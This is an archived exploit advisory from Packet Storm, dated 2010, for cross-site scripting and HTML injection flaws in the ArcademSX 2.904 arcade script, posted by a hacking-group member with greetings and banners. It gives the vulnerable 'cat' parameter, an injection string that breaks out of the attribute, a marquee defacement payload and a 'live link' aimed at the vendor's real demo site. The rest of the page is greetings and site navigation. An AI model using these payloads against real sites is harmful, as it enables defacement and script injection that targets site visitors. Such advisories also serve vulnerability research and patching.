what you don't know can hurt you

ArcademSX 2.904 Cross Site Scripting

ArcademSX 2.904 Cross Site Scripting
Posted Jun 30, 2010
Authored by Th3 RDX

ArcademSX version 2.904 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | e770778d6aa4038ff6a6b83970530ccbd968d2c967defbe34b35fe87c2aa7045

ArcademSX 2.904 Cross Site Scripting

Change Mirror Download


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm Th3 RDX member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: ArcademSX v2.904 (XSS|HTML Injection) Multiple Vulnerabilities
# Date: 29-06-2010
# Author: Th3 RDX
# Software Link:
# Version: 2.904
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky,
r0073r(inj3ct0r.com), Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RooT Bro waiting for u to come online desperately and missing you alot :(
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

ArcademSX v2.904 (XSS|HTML Injection) Multiple Vulnerabilities

----- [ Vendor ] -----

https://secure.agaresmedia.com/v6/free-stuff/download-arcadem-le-arcade-script-for-free/

%\\
##############################################################################

##############################################################################
%//

----- [ Injection (s) ] -----

----- [ XSS Injection ] -----

Put [XSS CODE] = '">

[XSS] http://server/arcademsx/index.php?cat=[XSS CODE]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

----- [ HTML Injection ] -----

Put [HTML CODE] = '"><marquee><font color=Red size=16>Th3 RDX/font></marquee>

[HTML] http://server/arcademsx/index.php?cat=[HTML CODE]

%\\
##############################################################################

##############################################################################
%//

>>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

[Link] http://arcadem.agaresmedia.com/index.php?cat='">[CODE (XSS + HTML) ]


In Search Box Paste Code: [CODE (XSS + HTML) ]

%\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 29 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#


Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close